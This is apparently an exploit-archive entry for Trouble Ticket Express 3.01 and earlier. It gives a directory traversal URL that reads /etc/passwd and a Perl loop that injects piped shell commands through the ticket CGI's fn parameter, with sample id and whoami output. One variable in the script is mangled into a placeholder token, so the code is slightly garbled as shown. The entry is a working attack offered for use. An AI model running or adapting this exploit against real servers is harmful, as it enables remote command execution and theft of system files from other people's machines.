|
========================================================================
Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal
=========================================================================
# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:
# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd
#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = 'http://localhost/cgi-bin/ttx.cgi';
print '$ ';
while (<>) {
print get( $url . '?cmd=file&fn=|' . ___FCKpd___0
. '|' );
print '$ ';
}
# ~ - [ [ : Inj3ct0r : ] ]
|